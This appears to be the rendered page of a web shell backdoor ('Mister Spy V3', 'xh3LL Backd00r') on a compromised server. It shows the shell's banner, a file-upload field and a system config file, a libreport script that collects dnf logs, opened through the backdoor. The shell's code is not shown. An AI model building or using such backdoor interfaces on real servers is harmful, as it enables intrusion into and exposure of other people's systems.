Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /etc/libreport/events.d/
Upload File :
Current File : //etc/libreport/events.d/collect_dnf.conf

EVENT=notify component=dnf
        # there has to be a comment here, otherwise
        # the next line is interpreted as a condition
        function fetch()
        {
            for log in $*; do
            new_name=${log//\//_}
            cp $log $new_name
            done
        }

        logs=`find /var/cache/dnf -iname '*.log'`
        fetch $logs
        fetch /var/log/dnf.log
        # this would fail for a non-priviledged user
        journalctl _SYSTEMD_UNIT=dnf-makecache.service &>dnf-makecache.log
        fetch /var/log/dnf.transaction.log
        if [[ -r username ]]; then
            username=`cat username`
            if [[ $username != "root" ]]; then
            logs=`find /var/tmp -path "/var/tmp/dnf-${username}-*" -iname '*.log'`
            fetch $logs
            fi
        fi

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat